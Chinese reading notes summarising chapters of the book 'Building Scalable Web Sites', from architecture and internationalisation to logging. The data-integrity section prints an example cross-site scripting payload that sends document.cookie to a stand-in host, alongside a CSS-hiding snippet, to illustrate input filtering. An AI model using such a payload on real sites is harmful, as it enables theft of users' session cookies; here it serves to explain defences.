《构建可扩张的web站点》读书笔记(二)
第零章 读后感
半天看完的,重点还是在第九章,讲安全的一章也很有意义,会让我们在开发中多留心一点。
对于web扩展,也有了一些初步的想法,对web的整体思想也有了更进一步的了解。
个人感觉不错,适合快速阅读。仅仅是个人意见。
第一章 绪论?1.作者构建的第一个web应用:是一个虚拟生物,玩家在虚拟的世界中跟踪这个生物成长,每天两次通过电子邮件发送给玩家。(这个创意非常不错)
2.Flickr有10W源代码,5W模板代码,1万js代码。
3.快速迭代往往有助于web应用的开发。
4.代码越早工作,就越早解决设计中的问题。由于开发用时少,在需要的时候就更容易放弃他。
第二章 Web应用程序体系结构1.忘记那些微不足道的调整,不成熟的优化是罪恶之源。
2.这一章主要讲怎么处理硬件的一类问题。
第三章 开发环境1.三大规则
源码控制、单步创建、跟踪bug
第四章 国际化和本地化1.对应英语
国际化:i18n
本地化:l10n
2.这一章讲各个软件和工具怎么设置编码。
第五章 数据一致和安全1.所谓数据完整性策略,就是一套规则和规章,他们关心的是应用程序如何做到存储和输出预期数据。
2.HTML输入过滤
a.js的攻击
<script>location.href='http://www.xxx.com/?cookies='+document.cookie;</script>
b.style
<style>body{display:none !important;}</style>
c.协议过滤
about:blankftp:/sv.com
3.sql注入攻击
第六章 电子邮件第七章 远程服务第八章 瓶颈1.cpu的使用,这个基本从来不会是web应用程序的瓶颈。
第九章 见《构建可扩张的web站点》读书笔记第十章 统计日志、检测与警告1.日志分访问日志和错误日志
2.可以关心一些开源的日志分析器,如:analog
3.这一章还讲了各个应用程序、开源工具的状态查看和检测。
第十一章 APIs讲解数据订阅的问题。现在还不需要知道。
?
?
完